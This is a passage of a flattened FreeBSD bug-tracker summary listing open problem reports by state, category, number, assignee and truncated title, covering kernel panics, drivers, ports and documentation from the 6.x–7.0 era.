[panic] Repeatable sysctl crash (Fatal Trap 12) with A o ports/121143 markus [PATCH] audio/cdparanoia: rip multisession CDs correct o ports/121134 apache www/mod_log_sql2-dtc scoreboard problem a bin/121124 sysinstall(8): FreeBSD 6.3 installation deletes MBR pa o kern/121122 ipfw [ipfw] [patch] add support to ToS IP PRECEDENCE fields o kern/121102 acpi [acpi_fujitsu] [patch] update acpi_fujitsu for the P80 o kern/121080 net [bge] IPv6 NUD problem on multi address config on bge0 o kern/121074 des [patch] Add RFC2617 digest authentication to fetch(3) o kern/121073 [kernel] [patch] run chroot as an unprivileged user o bin/121072 fs [smbfs] mount_smbfs(8) cannot normally convert the cha o conf/121064 [patch] Use ASCII characters for box/line characters i o kern/121061 sam [ath] [panic] panic while ejecting ath(4)-adapter duri o bin/121059 ntpd(8) doesn't sync with servers after dhclient chang f ports/121050 New port: sysutils/heartbeat2 Linux High-Availability o usb/121045 usb [uftdi] [patch] Add support for PC-OP-RS1 and KURO-RS o bin/120994 [patch] alignment violation in chap module of ppp(8) c o conf/120993 [patch] 340.noid -- Add "find -x" capability (don't cr f kern/120991 fs [panic] [fs] [snapshot] System crashes when manipulati o bin/120990 [patch] support "BIOS Boot" partition type in gpt(8) o kern/120989 scottl [udf] [patch] UDF (with DVD RAM) isn't mountable/reada o kern/120970 rnoland [drm] Radeon Problems related to DRM and/or DRI o kern/120966 net [rum] kernel panic with if_rum and WPA encryption o stand/120947 standards xsm ignores system.xsm and .xsmstartup p docs/120945 net [patch] ip6(4) man page lacks documentation for TCLASS o i386/120933 i386 [boot] 6.x and 7.x do not boot from CD on IBM HS20 883 s docs/120917 doc [request]: Man pages mising for thr_xxx syscalls p bin/120891 dwmalone [patch] enhancement to syslogd(8) - always printing lo o kern/120884 [bktr] [patch] bktr driver always stores the contigmal o kern/120872 [libkvm] [patch] fstat exit on signal 11 o bin/120870 [patch] truss(1) shows 'pipe' system call as having 6 o kern/120858 scottl [patch] [cam] panic: ufs_dirbad with CLARiiON CX3-40 o kern/120857 multimedia [snd_emu10k1] snd_emu10k1 driver issues a warning on u o kern/120842 scottl [hptrr] hptrr driver causes detection of Marvell 88SX6 o bin/120813 [patch] grdc(6) off by 500 ms (on average) o kern/120791 [bge] The Broadcom BCM5703 A2 NIC is running a lot of o kern/120787 [atapicam] hardware troubles with atapicam and dvd o usb/120786 usb [usb] [panic] Kernel panic when forced umount of a det o kern/120780 multimedia [snd_hda] snd_hda doesn't work on Dell Latitutude D530 o ports/120756 des [PATCH] sysutils/munin-node: Use fixed GID o ports/120755 des [PATCH] sysutils/munin-main: Use fixed UID/GID o kern/120749 arch [request] Suggest upping the default kern.ps_arg_cache o kern/120733 cperciva libbsm.so.1 missing after upgrading to 6.3-RELEASE o usb/120729 usb [panic] fault while in kernel mode with connecting USB o kern/120717 [ata] boot problem when recognizing ata1 p kern/120714 gonzo [viapm] [patch] viapm driver doesn't work on VIA VT823 o www/120621 bugmeister web interface query-pr-summary.cgi matches no PRs for o kern/120615 scottl [hptrr] hptrr on 6.3-RELEASE/i386 causes filesystem da a misc/120608 linimon gmirror(8) command set on livecd is minimal [regressio o usb/120572 usb [umass] [patch] quirk to support ASUS P535 as umass (a o kern/120566 net [request]: ifconfig(8) make order of arguments more fr o bin/120552 cperciva freebsd-update(8): freebsd-update - -r should check ex o docs/120539 doc Inconsistent ipfw's man page o kern/120534 [ata] Troubles in work with SAS controller Adaptec 941 o ports/120532 portmgr [PATCH] bsd.port.mk - add more recursive-foo targets o kern/120515 acpi [acpi] [patch] acpi_alloc_wakeup_handler: can't alloc o kern/120507 [ata] Errors while burning CDs using burncd(8) o kern/120493 benjsc [wpi] if_wpi.ko fails to load on a Toshiba Satellite P o kern/120487 scsi [sg] scsi_sg incompatible with scanners o kern/120483 fs [ntfs] [patch] NTFS filesystem locking changes o kern/120482 fs [ntfs] [patch] Sync style changes between NetBSD and F o docs/120456 doc ath(4) needs to specify requirement on wlan_scan_sta o conf/120431 rc [patch] devfs.rules are not initialized under certain o conf/120406 rc [devd] [patch] Handle newly attached pcm devices (eg. o kern/120376 imp [ath] High interrupt load when booting with ath (PCMCI o ports/120372 java java/linux-sun-jdk16: linux-sun-jre1.6.0 plugin doesn' f ports/120359 dinoex print/cups port pkg_info improvement -- FreeBSD lp* no o kern/120344 rwatson [panic] FreeBSD 6.3-STABLE panics on high loaded web s p kern/120343 ups [panic] Reproducible Crash - network interface related o usb/120321 usb [hang] System hangs when transferring data to WD MyBoo o ia64/120315 ia64 Backing store switch in exception_save_restart leaves o kern/120304 net [netgraph] [patch] netgraph source assumes 32-bit time f kern/120296 linimon [ata] Unstable SATA on MB with Nvidia MCP 570 SLI chip o bin/120288 fs zfs(8): "zfs share -a" does not send SIGHUP to mountd o usb/120283 usb [panic] Automation reboot with wireless keyboard & mou o kern/120282 imp [ath] [panic] resource_list_release: resource entry is o kern/120281 pf [pf] [request] lost returning packets to PF for a rdr o kern/120270 simon [crypto] [patch] AES-192 and AES-256 support for HW-ac o kern/120266 net [udp] [panic] gnugk causes kernel panic when closing U o conf/120263 [patch] 800.loginfail misses relevant security informa o kern/120262 rnoland [drm] "0MB"; no dri with i915G [regression] o bin/120256 [patch] ftp(1): ftp -u URL/ returns a -1 f kern/120253 kernel crashes after hard disk geometry while probing o kern/120247 scsi [mpt] FreeBSD 6.3 and LSI Logic 1030 = only 3.300MB/s o kern/120232 net [nfe] [patch] Bring in nfe(4) to RELENG_6 o kern/120231 geom [geom] GEOM_CONCAT error adding second drive o ports/120229 apache www/apache20 does not pick up usernames from NIS [regr o conf/120228 rc [zfs] [patch] Split ZFS volume startup / ease ZFS swap f kern/120210 kmacy [zfs] [panic] reboot after panic: solaris assert: arc_ o amd64/120202 amd64 [amd64] [patch] [panic] kernel panic at start_all_aps, o conf/120194 rc [patch] UFS volumes on ZVOLs cannot be fsck'd at boot o kern/120177 [ata] ATA DMA modes don't work on CF cards o ports/120173 jmelo Prevent ports mail/mailman zombieing remote servers/ o java/120146 java java/jdk15: netbeans 6.0 causes java core dump on amd6 o bin/120143 [panic] sysinstall(8): FreeBSD6.3 page faulted after a p kern/120138 jeff [sched_ule] [patch] steal_thresh may be set a wrong va o kern/120130 net [carp] [panic] carp causes kernel panics in any conste o kern/120128 attilio [libc] [patch] __getcwd erroneously returning ENOENT o kern/120127 [loader] Loading of gzip'd mfsroot from pxeboot(8) cau o docs/120125 doc [patch] Installing FreeBSD 7.0 via serial console and o bin/120114 [patch] reboot(8) - add features available in Solaris. o ports/120101 cy security/krb5 utilities link against wrong libcom_err o bin/120095 gdb(1) fails to catch signals when threading is involv o kern/120091 geom [geom] [geli] [gjournal] geli does not prompt for pass o kern/120090 [geli] geli boot password input fails when using usb k o kern/120075 [libcrypt] Incompatible EOS of key in crypt(3) o kern/120073 [new driver] [patch] add support for Meinberg PCI-base o kern/120072 Interpreter fails to invoke on 6.3-RELEASE, reproducab o kern/120066 [geli] geli boot password input fail when using serial o bin/120064 routed(8) marks 802.11 interfaces broken o bin/120060 net routed(8) deletes link-level routes in the presence of o kern/120057 pf [pf] [patch] Allow proper settings of ALTQ_HFSC. The c o bin/120055 dchagin [linux] kdump(1) segfaults on freebsd6_mmap syscall o kern/120044 geom [msdosfs] [geom] incorrect MSDOSFS label fries adminis o usb/120034 usb [hang] 6.2 & 6.3 hangs on boot at usb0: OHCI with 1.5 o docs/120024 doc resolver(5) and hosts(5) need updated for IPv6 o kern/120021 geom [geom] [panic] net-p2p/qbittorrent crashes system when o kern/120009 [ata] Burning on FreeBSD is destroying SONY CD-Rs o ports/119997 dougb [PATCH] dns/bind94: added GeoIP patches o usb/119981 usb [axe] [patch] add support for LOGITEC LAN-GTJ/U2 gigab o usb/119977 usb [ums] Mouse does not work in a Cherry-USB keyboard/mou s ports/119974 pgollucci net-mgmt/net-snmp problem on SPARC-64 o kern/119973 multimedia [snd_maestro] snd_maestro only works after reload [reg a ports/119966 roam mail/vpopmail patch o i386/119946 i386 [est] sysctl dev.cpu.0.freq on 75 Hz, cannot be change o kern/119945 net [rum] [panic] rum device in hostap mode, cause kernel o kern/119931 multimedia [sound] No sound card detected on ASUS "K8V-X SE R2.00 o ports/119923 demon [patch] sysutils/ascpu does not work FreeBSD 8.0-CURRE p threa/119920 deischen [patch] fork broken in libpthread o bin/119903 [ncurses] Fast increase in loading of the processor. A o kern/119895 [est] Core2Duo CPUs not recognized by EST o kern/119894 [ata] Initialization of disc controller fails [regress o kern/119891 slow halt, reboot when remote network shares which doe o kern/119877 [ata] OS Fails to detect hard disks on HP Proliant ML1 o conf/119874 rc [patch] "/etc/rc.d/pf reload" fails if there are macro o kern/119850 [radeon] radeon module doesnt work right, when loaded o kern/119842 jail [smbfs] [jail] "Bad address" with smbfs inside a jail o kern/119838 [ata] udma100 enabled althrough improper cable on nVid o i386/119809 gavin [virtualpc] MS Virtual PC 2007 - Install hung - Trying o bin/119801 dhclient(8): dhclient changes alias to address o kern/119791 net [nfs] UDP NFS mount of aliased IP addresses from a Sol f bin/119776 vwe can't start sshd(8) o kern/119767 jfv [em] [patch] if_em fix for systems without msix suppor o kern/119759 multimedia [snd_emu10k1] Can not record anything with emu10k1 on o kern/119754 jfv [em] em hung after "watchdog timeout -- resetting" on o kern/119743 geom [geom] geom label for cds is keeped after dismount and f kern/119735 fs [zfs] geli + ZFS + samba starting on boot panics 7.0-B o ports/119732 java java/linux-sun-jre16: linux-sun-jre16 plugin doesn't w o ports/119710 sumikawa [patch] net/netcat - nc command runs BSD nc instead of o kern/119696 [irq] [ral] ral device causes massive interrupt storm o bin/119695 pw(8) does not interact with nscd(8) o kern/119668 scsi [cam] [patch] certain errors are too verbose comparing o usb/119653 usb [cam] [patch] iriver s7 player sync cache error patch s bin/119645 [request] mount_ntfs(8) -- files permissions mask is i o usb/119633 usb [umass] umass0: BBB reset failed, IOERROR [regression] o kern/119618 [fdc] Double Density Disks do not work correctly o kern/119617 net [nfs] nfs error on wpa network when reseting/shutdown f kern/119613 yongari [msk] mskc0: Uncorrectable PCI Express error o bin/119610 [patch] config(8): config -x appends unwanted trailing o kern/119606 [sio] [patch] PCMCIA card not attached to driver o amd64/119591 amd64 [amd64] [patch] time_t on 64-bit architecture o kern/119575 simokawa [firewire] [patch] sbp_targ cannot handle multiple CTI o i386/119574 i386 [i386] 7.0-RC1 times out in calibrate_clocks() [regres o kern/119572 [sbp] PowerBook not accessable when in target mode o conf/119550 [ppp] ppp not starting during bootup. o docs/119545 doc books/arch-handbook/usb/chapter.sgml formatting a docs/119536 doc a few typos in French handbook (basics) o bin/119524 cron(8) suddenly stops working, not crash f kern/119516 net [ip6] [panic] _mtx_lock_sleep: recursed on non-recursi o usb/119513 usb [irq] inserting dlink dwl-g630 wireless card results i o usb/119509 usb [usb] USB flaky on Dell Optiplex 755 o kern/119507 [dri] mach64.o kernel module version is 1.0.0, but ver p bin/119490 top(1) hangs for long periods with NIS -- even using - f kern/119487 [em] page fault in em taskq with polling enabled o bin/119483 [patch] vidcontrol(1) misses latest VESA mode (off-by- o usb/119481 usb [hang] FreeBSD not responding after connecting USB-Mas o conf/119464 [patch] [request] Add 'sorted' option to etc/periodic/ o kern/119432 net [arp] route add -host -iface causes arp e o usb/119389 usb [umass] Sony DSC-W1 CBI reset failed, STALLED [regress o docs/119386 blackend bsdlabel and newfs on DVD-RAM (handbook ch. 18.7.9) o kern/119374 thomas [ata] [regression] ATAPI or ATAPICAM bug (regression i o kern/119358 [kernel] [patch] SYSINIT_VERBOSE can be more verbose o ports/119357 maho lang/gcc42 WITH_JAVA_AWT=yes fails to install o kern/119356 acpi [acpi]: i386 ACPI wakeup not work due resource exhaust o bin/119354 mux csup(1) in free(): error: chunk is already free o ports/119352 nork graphics/ilmbase configure tests for shared semaphores f kern/119345 vwe [ath] Unsuported Atheros 5424/2424 and CPU speedstep n p docs/119338 trhodes gprof(1) refers to unmentioned option "-c" p docs/119329 trhodes [patch] Fix misleading man 1 split o kern/119307 emaste [queue] [patch] TRASHIT macro blasts list header if RE f kern/119303 linimon [ata] SATA HDD missing in 7.0-RC1, ok in 7.0-BETA4; at o kern/119298 kan [xfs] [patch] 7-Stable/sys/modules/xfs fails to make f o kern/119293 [gbde] gbde swap encryption forces gmirror to rebuild o kern/119259 [panic] kernel panic on asus c90s laptop after first ( o sparc/119244 sparc64 X11Forwarding to X11 server on sparc crashes Xorg o sparc/119240 sparc64 top has WCPU over 100% on UP system s sparc/119239 sparc64 gdb coredumps on sparc64 o usb/119227 usb [ubsa] [patch] ubsa buffer is too small; should be tun o kern/119225 net [wi] 7.0-RC1 no carrier with Prism 2.5 wifi card [regr o kern/119205 [dc] [patch] Collect various stats regarding dc(4) int o kern/119202 [kernel] [patch] Add generic support for disabling dev o usb/119201 usb [cam] [patch] Quirks for Olympus FE-210 camera, LG and o kern/119200 acpi [acpi] Lid close switch suspends CPU for 1 second on H o kern/119197 [psm]: PS/2 mouse doesn't work under FreeBSD i386 7.0 s bin/119196 des fetch(1): [request] parallel download from multiple se o i386/119175 i386 [busdma] [patch] Typo in bus_dmamem_alloc() o usb/119150 remko [usbdevs] [patch] new usbdevs for CDMA 1xEVDO devices o kern/119140 [ata] [panic] Kernel panic with sata drive and dma pro o ports/119119 timur net/samba3 - 3.0.28 stops working with ZFS whereas 3.0 o bin/119077 [patch] sysinstall(8) - reading packages from index is o conf/119076 rc [patch] [rc.d] /etc/rc.d/netif tries to remove alias a o bin/119068 dd(1) yields a bogus error when input file is to small o java/119063 java An unexpected error has been detected by Java Runtime f ports/119048 portmgr bsd.port.mk - per-port make.port.conf support [fix inc f kern/119047 yongari [re] Not correct working RealTek 8168/8111B PCIe Gigab o kern/119043 [twa] twa hang after heavy disk IO o bin/119014 [patch] IPv6 addresses cause sockstat(1) to run column o kern/118993 ipfw [ipfw] page fault - probably it's a locking problem o kern/118990 [nve] nve + PAE bus_addr_t/void * inconsistencies a bin/118987 net ifconfig(8): ifconfig -l (address_family) does not wor o kern/118973 acpi [acpi]: Kernel panic with acpi boot o kern/118962 [agp] Intel GMA 3000 Video Controller Not Recognized U o ports/118958 portmgr Mk/bsd.autotools.mk: find configure if CONFIGURE_WRKSR o java/118956 java eclipse and netbeans break on diablo-jdk15 o sparc/118932 net [panic] 7.0-BETA4/sparc-64 kernel panic in rip_output o kern/118927 jfv [em] em(4) broken: link state changed to DOWN (/UP), l o kern/118912 fs [2tb] disk sizing/geometry problem with large array o docs/118902 doc [patch] wrong signatures in d2i_RSAPublicKey man pages o kern/118880 bz [ip6] IP_RECVDSTADDR & IP_SENDSRCADDR not implemented a kern/118879 net [bge] [patch] bge has checksum problems on the 5703 ch o bin/118874 [patch] tftpd(8): add TFTP Option Extension (rfc 2347) o misc/118855 fs [zfs] ZFS-related commands are nonfunctional in fixit o kern/118819 [vmware] FreeBSD 6.2 in VMware is unstable and there i p conf/118770 mtm [patch] rc.d scripts: print information instead of sil o bin/118759 cvs(1): cvs -R doesn't handle non-existent tags o kern/118739 [cpufreq] [patch] Allow the cpufreq/p4tcc driver to de o kern/118734 [xen] FreeBSD 6.3-RC1 and FreeBSD 7.0-BETA 4 fail to b o kern/118727 net [netgraph] [patch] [request] add new ng_pf module o bin/118723 gcooper [patch] od(1)/hexdump(1) truncates last partial repeat o ports/118716 shaun security/heimhal - shared library conflict with heimda o threa/118715 threads kse problem o kern/118713 fs [minidump] [patch] Display media size required for a k o ports/118697 portmgr bsd.port.mk - error-inducing absolute path in X11R6 sy o kern/118695 jfv [em] device polling + vlan causes panic on "em" interf o docs/118693 jfv Update for "em" man page for RELENG_7 o ports/118677 timur [net/samba3] Unix password synchronization with PAM do o i386/118656 i386 [panic] Init dies in single user mode and box get kern o bin/118636 sysinstall(8): [patch] [request] remove requirement fo o kern/118573 [ata] FreeBSD doesnt support my optical drive s kern/118571 [boot] [request] fix BTX issues when booting FreeBSD 7 o threa/118544 delphij [libc] [patch] the "clnt_create" function in "libc/rpc p kern/118540 kaiw [elf] [patch] update sys/sys/elf_common.h with new ema o kern/118534 [ipw] bitrate and power wifi can't change/set ipw Inte o bin/118503 sysinstall(8): sysinstall(8) and /etc/rc.conf o bin/118501 Sending SIGINT to cvs(1) gives segmentation fault o java/118496 java Eclipse packages do not work with 6.3-RC1/amd64 o kern/118493 weongyo [ndis] [patch] a trivial fix when ndis sets `ndis_reso o usb/118485 usb [usbdevs] [patch] Logitech Headset Workaround o usb/118480 usb [umass] Timeout in USB mass storage freezes vfs layer o kern/118459 [hang] Freeze under high-load with SMP until keypresse o bin/118449 randi sysinstall(8): Installer failing dns lookups o kern/118447 [ata] [patch] Troublesome DMA modes with VIA Apollo VP p kern/118439 thompsa [ndis] [patch] if_ndis - fix a panic when ndis_attach( f ports/118419 danfe x11/nvidia-driver: link_elf: symbol _sleep undefined o gnu/118415 nm -D fails if a file has no symbols a ports/118406 danfe x11/nvidia-driver-*xx: nvidia driver port name conflic o kern/118399 secteam [tap] local/remote kernel DoS through TAP device p usb/118374 attilio [ubsa] [patch] support Option GlobeTrotter Max 3.6 wir p kern/118370 thompsa [ndis] [patch] if_ndis - fix a scanning problem of Mar o bin/118355 pf [pf] [patch] pfctl(8) help message options order false o usb/118353 usb [panic] [ppp] repeatable kernel panic during ppp(4) se o i386/118350 i386 [boot] [hang] BTX loader hangs on PC Engines WRAP o kern/118342 [ata] Unable to mount root on ata drive w/ Cyrix 5530 o docs/118332 doc man page for top does not describe STATE column wait e o bin/118325 rc [patch] [request] new periodic script to test statuses o kern/118320 fs [zfs] [patch] NFS SETATTR sometimes fails to set file o bin/118318 mohans [nfs] NFS server hangs under special circumstances o kern/118317 [zlib] [patch] Incorrect gzeof() return value in zlib o conf/118315 dougb Local startup scripts run twice p kern/118304 kib freebsd 7 delivers unanticipated signal for page fault o ports/118301 python devel/py-setuptools easy-install.pth contents lost on o bin/118297 weongyo [patch] ndiscvt(8): sort a output format. o bin/118296 weongyo [patch] ndiscvt(8) can't parse a STRING WORD pattern w o bin/118295 weongyo [patch] ndiscvt(8) makes a syntax error when it proces o bin/118294 weongyo [patch] ndiscvt(8) can't parse WORD which includes '(' o i386/118285 i386 [i386] Segmentation fault in reloc_non_plt. o kern/118282 [sg] device sg + hald + umass plugging crashes 7.0 p bin/118260 bin: more informative error message for install(1) o conf/118255 rc savecore never finding kernel core dumps (rcorder prob o bin/118249 fs mv(1): moving a directory changes its mtime o bin/118248 gavin newsyslog(8) does not obey -s (nosignal) flag a kern/118238 net [bce] [patch] bce driver shows "no carrier" on Intel S o ports/118237 multimedia Ports: multimedia/ffmpeg fix configure option and add o ports/118230 acm games/linux-quake4 fails to start o kern/118222 [pxeboot] [patch] FreeBSD 7.0 PXE + NFS / "Can't work o ports/118218 krion x11/xterm should be configured with --enable-setuid fo o docs/118214 doc close(2) error returns incomplete o bin/118207 burncd(8) gives I/O error writing CD on Pioneer DVDR-1 o bin/118205 [patch] [request] new options -r to pkill(1) a pid aft o ports/118196 krion x11/xterm v229 mishandles combining characters o gnu/118188 obrien GCC bug with abs() o ports/118168 multimedia [patch] multimedia/transcode - Add WITHOUT_X11 and WIT f kern/118161 thomas [atapicam] failure message from ATAPI CDROM in the boo s kern/118158 [ata] SONY SDX-570V (ATAPI) hangs frequently o bin/118144 des [patch] pam_lastlog doesn't check return values in pam o usb/118141 usb [ucom] usb serial and nokia phones ucomreadcb ucomread o usb/118140 usb [ucom] [patch] quick hack for ucom to get it behave wi o kern/118137 process stuck in pipewr (similar to kern/55908?) o bin/118132 [patch] pax(1): broken -s handling of \1, \2 ... f kern/118128 oleg [dummynet] Dummynet cause kernel trap or system freeze o kern/118126 kmacy [nfs] Poor NFS server write performance s kern/118124 [request] HZ value on slow computers should by dynamic o bin/118123 [patch] chat(8) has infinite recursion bug o misc/118121 [build] RELENG_7 kernel compile fails with -Os o bin/118114 [patch] update manctl(8) o conf/118113 [md] mdconfig init script requires image to be on root o conf/118111 [patch] [request] Add MAC address based interface rena o kern/118107 fs [ntfs] [panic] Kernel panic when accessing a file at N o usb/118098 usb [umass] 6th gen iPod causes problems when disconnectin o kern/118093 firewire [firewire] firewire bus reset hogs CPU, causing data t a bin/118071 darrenr ipnat(8): ipnat -s expired counter does not update [re o bin/118069 thomas [patch] camcontrol(8) should be able to leave device s o conf/118047 Move /etc/printcap to /usr/share/examples/ o kern/118044 [panic] [lor] spin lock held too long o kern/118021 randi [keyboard] 7.0 Beta 2 sysinstall keyboard emits contro o docs/118020 doc ipfilter(4): man pages query for man 4 ipfilter return o bin/118014 remko [patch] arp(8): Minor style(9) change to src/usr.sbin/ p bin/118005 andre Can No Longer SSH into 7.0 host o ports/118003 apache www/apache22: with PgSQL option require only libpq.so. a kern/117987 rwatson read(2) on directories might leak filenames of deleted o kern/117973 [panic] [lpt] 7.0-BETA2: repeatable panic while printi o kern/117972 [ata] SATA DLT V4 not recognized properly p bin/117966 fdread(1) aborts with EPERM o usb/117955 usb [umass] [panic] inserting minolta dimage a2 crashes OS o kern/117954 [ufs] dirhash on very large directories blocks the mac o usb/117946 usb [panic] D-Link DUB-E100 rev. B1 crashes FreeBSD 7.0-BE o kern/117943 kmacy [zfs] zfs snapshot directory could not access from NFS o usb/117938 usb [ums] [patch] Adding support for MS WL Natural and MS o conf/117935 rc [patch] ppp fails to start at boot because of missing o kern/117926 jfv [em] Intel S5000-based mobo, em driver does not attach f ports/117923 maho USE_FORTRAN=yes: shared libraries for blas, lapack, an o bin/117922 ftpd(8): remote ftp user possible leave chrooted envir o ports/117921 vanilla New port: multimedia/feng Feng is a multimedia streami o usb/117911 usb [ums] [request] Mouse Gembird MUSWC not work s ports/117907 x11 x11-servers/mga_hal broken on 7.0-BETA (GLIBC error) o usb/117893 usb [umass] Lacie USB DVD writing failing o kern/117867 kmacy [heimdal] kinit generates bad tickets on multihomed IP s bin/117830 [patch] who(1) no longer displays entries for folk log o bin/117812 passwd(1): incapable of changing LDAP passowrds using o misc/117811 [build] Building multiple kernels with KERNCONF="ONE T p docs/117798 trhodes formatting oddity in sysmouse(4) o gnu/117756 dialog_checklist() does not honour DisplayX/DisplayY o conf/117753 Pediodic script 100.clean-disks cleans out some useful f bin/117751 [patch] [request] Make pw(8) support "-d" argument o bin/117748 sh(1): Backslash quote fails in pattern for substring o docs/117747 doc 'break' system call needs a man page o bin/117733 [patch] [request] allow to tee(1) to sockets, descript s kern/117717 net [panic] Kernel panic with Bittorrent client. o usb/117712 [reboot] unexpected reboot after mount USB flash drive f kern/117711 matteo [rpc] rpcbind binds to all interfaces on random ports o kern/117709 simon [libcrypto] [patch] Base openssl does not define OPENS o kern/117688 [mpt] mpt disk timeout and hang o bin/117687 [patch] fstab(5) format cannot handle spaces o kern/117681 [virtualbox] pcn fails to send packets under VirtualBo f kern/117655 sam [ral] ral%d: device timeout when running as an access o usb/117613 usb [uhci] [irq] uhci interrupt storm & USB leaked memory o kern/117607 [amd64] dev.cpu.0.freq not showing up any longer on am o kern/117605 acpi [acpi] [request] add debug.cpufreq.highest f bin/117603 linimon [patch] dump(8) hangs on SMP - 4way and higher. o usb/117598 usb [uaudio] [patch] Not possible to record with Plantroni p conf/117555 dougb [patch] [nis] NIS-dependent services cannot start if y o ports/117551 tmclaugh [New Port] lang/boo, the boo programming language. o usb/117546 remko [uftdi] [patch] Add MaxStream ZigBee product ID to uft o ports/117545 tmclaugh [New Port] devel/monodevelop o bin/117520 mux [patch] csup(1) not-really-equivalent to cvsup s kern/117513 vwe [panic] [ath] Fatal trap 12: page fault while in kerne p kern/117512 des [libpam] [patch] document .opieaccess for pam_opieacce o kern/117510 [headers] [patch] sys/cdefs.h lacks support for PCC o bin/117492 reset(1) doesn't restore erase token o gnu/117481 sort(1) incorrect numeric sort in very specific cases o kern/117474 [hang] HP Proliant 5500 hangs on reboot with 6.2 o bin/117452 [patch] tftp(1): the fix for PR 103206 was incorrect o kern/117448 net [carp] 6.2 kernel crash [regression] o kern/117443 [ata] [hang] system hang with ataidle o ports/117440 kde misc/kdeedu3 - Request to package README.ephemerides f o ports/117431 itetcu Update port: graphics/ipe Version 6.0pre28 of Ipe that o kern/117423 net [vlan] Duplicate IP on different interfaces o kern/117421 [ata] [hang] System hang with failing SATA disk (SiI31 o kern/117420 jeff [sched_ule] round off in sched_balance_pair() o amd64/117418 amd64 [hang] FreeBSD 6.2 crash on amd64 4400+ with ssh o kern/117374 vidcontrol(1) videomode: Operation not supported by de o kern/117348 [libedit] Loading history file sometimes fails in libe o bin/117339 net [patch] route(8): loading routing management commands o amd64/117316 amd64 [acpi] ACPI lockups on SuperMicro motherboard o bin/117315 fs [smbfs] mount_smbfs(8) and related options can't mount o kern/117314 fs [ntfs] Long-filename only NTFS fs'es cause kernel pani o usb/117313 usb [umass] [panic] panic on usb camera insertion o docs/117308 gavin [patch] Clarification of /etc/defaults/devfs.rules sta s ports/117299 edwin [NEW PORTS] www/webobjects(+) Apple WebObjects ports b o i386/117297 i386 [hang] System hangs up every day o amd64/117296 amd64 [ata] I don`t see second SATA IDE on VIA VT8237A o bin/117277 des [patch] fetch(1): fetch's resume mode doesn't verify t o kern/117271 net [tap] OpenVPN TAP uses 99% CPU on releng_6 when if_tap o bin/117256 kgdb(1) cannot read PTD o kern/117242 [powerd] [hang] console hangs when powerd is adaptive o kern/117234 ipfw [ipfw] [patch] ipfw send_pkt() and ipfw_tick() don't s o kern/117215 [ata] Kernel errors accessing audio CDs w/ Samsung SAT o bin/117214 ipfw ipfw(8) fwd with IPv6 treats input as IPv4 o usb/117205 remko [uscanner] [patch] uscanner support for HP ScanJet 447 o usb/117200 usb [ugen] ugen0 prints strange string on attach if detach o bin/117191 [patch] OptionalObsoleteFiles.inc - Add files to remov o kern/117188 [geli] System crashes/reboots on access to file on GEL a amd64/117186 amd64 [modules] kldload Unsupported file type on STABLE amd6 p usb/117185 thompsa [umodem] [patch] Add support for UNION interface descr o usb/117183 usb [panic] USB/fusefs -- panic while transferring large a o ports/117178 portmgr bsd.port.mk - Remove ${INDEXDIR}/${INDEXFILE}.bz2 afte o kern/117158 fs [zfs] zpool scrub causes panic if geli vdevs detach on f usb/117150 weongyo [zyd] usb zyd device under moderate load panics system o bin/117093 kensmith [patch] [request] Teach sysinstall(8) to load config f o kern/117043 net [em] Intel PWLA8492MT Dual-Port Network adapter EEPROM o kern/117028 [atapicam] [panic] brelse: free buffer onto another qu a conf/117027 yar rc.subr doesnt deal with perl daemons o kern/117026 imp [pcmcia]: Panic while removing PCMCIA wireless card p docs/117013 trhodes mount_smbfs(8) doesn't document -U (username) argument o kern/117000 glebius [carp] CARP using address-less host NIC (carpdev) p ports/116984 apache [patch] www/apache13-modssl missing perl5.8 as RUN_DEP o bin/116980 fs [msdosfs] [patch] mount_msdosfs(8) resets some flags f o usb/116947 usb [ukbd] [patch] [regression] enable boot protocol on th o misc/116946 holographic shell breaks live CD shell o kern/116939 acpi [acpi] PCI-to-PCI misconfigured for bus three and can o kern/116935 [ata] Intermittent error with Promise PDC40718 o conf/116931 lack of fsck_cd9660 prevents mounting iso images with o kern/116913 fs [ffs] [panic] ffs_blkfree: freeing free block o bin/116908 pkg_create(1): pkg_create -b makes invalid packages fo p kern/116896 geom [geom] [patch] Typo in a kassert in GEOM o kern/116853 yongari [msk] msk watchdog timeout o i386/116844 i386 [boot] [hang] cannot boot from cd when using Dell Vost o ports/116841 java cannot build java/jdk16 by using java/linux-sun-jdk16 o kern/116837 net [tun] [panic] [patch] ifconfig tunX destroy: panic o stand/116826 standards [patch] sh support for POSIX character classes o bin/116784 mount_msdosfs(8): mount_msdosfs -L ru_RU.KOI8-R -W koi o bin/116782 [geli] geli not updated on migrate from 6.1 to 6.2 rel o kern/116770 [kqueue] Unfortunate fifo/O_NONBLOCK/kevent interactio o kern/116747 net [ndis] FreeBSD 7.0-CURRENT crash with Dell TrueMobile f ports/116741 openoffice editors/openoffice.org-2 build errors related to java o ports/116728 shaun news/inn - ckpasswd (contained INN) crashed o bin/116722 ntpd(8): ntpd core dumps if hostnames are not specifed o kern/116719 [panic] kill all watch causes page fault on kernel ser o kern/116701 [atapicam] atapicam hangs initializing SATA DVDRs on s o usb/116699 usb [usbhid] USB HID devices do not initialize at system b a kern/116697 kmacy [net] [patch] ifconfig's name argument has no effect o s amd64/116689 amd64 [request] support for MSI K9MM-V o bin/116688 cpio(1): cpio with -c option does not work. o threa/116668 threads can no longer use jdk15 with libthr on -stable SMP o java/116667 java linux-sun-javac1.4 hangs on SMP o www/116660 www docs.freebsd.org returns bad chunked encoding o bin/116643 net [patch] [request] fstat(1): add INET/INET6 socket deta o amd64/116620 amd64 [hang] ifconfig spins when creating carp(4) device on p kern/116608 fs [msdosfs] [patch] msdosfs fails to check mount options f ports/116601 portmgr [patch] bsd.port.mk - fail if dependency failed o www/116594 bugmeister query-pr.cgi on ports/116460 o docs/116588 remko No IPFW tables or dummynet in Handbook o kern/116583 fs [ffs] [hang] System freezes for short time when using o ports/116571 skv databases/firebird20-client fails to compile in a jail o usb/116561 usb [umodem] [panic] RELENG_6 umodem panic "trying to slee o kern/116515 remko [ntfs] NTFS mount does not check that user has permiss o docs/116480 doc sysctl(3) description of kern.file no longer applies s o www/116479 www cvsweb+enscript formatting bugfix o stand/116477 standards rm(1): rm behaves unexpectedly when using -r and relat o misc/116453 [picobsd] picobsd build script fails for not exist log s kern/116444 vwe [ath] Atheros 5005G (AR5212) miniPCI: unable to attach o ports/116443 x11 x11-drivers/xf86-input-keyboard patch for USB jp106 ke s ports/116441 pav net/boinc-client patch for daemon mode o kern/116435 [drm] drm/i915 reports memory leak o bin/116425 [patch] [request] ls(1) options for pre-sort of direct o conf/116416 mtm [patch] [request] per-jail rc.conf(5) style configurat o kern/116415 [ata] 6.2-STABLE does not work on 